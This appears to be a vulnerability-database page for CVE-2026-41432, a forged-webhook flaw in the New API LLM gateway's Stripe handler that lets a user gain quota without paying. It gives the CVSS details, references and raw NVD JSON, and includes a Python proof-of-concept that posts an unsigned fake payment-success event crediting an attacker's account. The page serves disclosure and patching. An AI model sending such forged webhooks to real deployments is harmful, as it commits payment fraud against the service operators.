CVE-2026-41432

Description

New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.12.10, a vulnerability exists in the Stripe webhook handler that allows an unauthenticated attacker to forge webhook events and credit arbitrary quota to their account without making any payment. This issue has been patched in version 0.12.10.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

New API < 0.12.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Target URL (Replace with actual target)
target_url = "http://target-url/api/stripe/webhook"

# Forge a Stripe payment success event payload
payload = {
    "id": "evt_1234567890",
    "type": "payment_intent.succeeded",
    "data": {
        "object": {
            "id": "pi_1234567890",
            "amount": 100000,  # Amount in cents (e.g., $1000.00)
            "currency": "usd",
            "metadata": {
                "user_id": "attacker_user_id" # Target user ID to credit
            }
        }
    }
}

# In a vulnerable version, signature verification might be missing or bypassable
headers = {
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)
    if response.status_code == 200:
        print("[+] Webhook sent successfully. Check account balance.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41432
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41432
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41432/
[4] VulDB https://vuldb.com/cve/CVE-2026-41432
[5] https://github.com/QuantumNous/new-api/releases/tag/v0.12.10
[6] https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4
[7] https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41432", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:35.457", "lastModified": "2026-05-12T03:16:12.823", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.12.10, a vulnerability exists in the Stripe webhook handler that allows an unauthenticated attacker to forge webhook events and credit arbitrary quota to their account without making any payment. This issue has been patched in version 0.12.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-863"}, {"lang": "en", "value": "CWE-1188"}]}], "references": [{"url": "https://github.com/QuantumNous/new-api/releases/tag/v0.12.10", "source": "[email protected]"}, {"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4", "source": "[email protected]"}, {"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}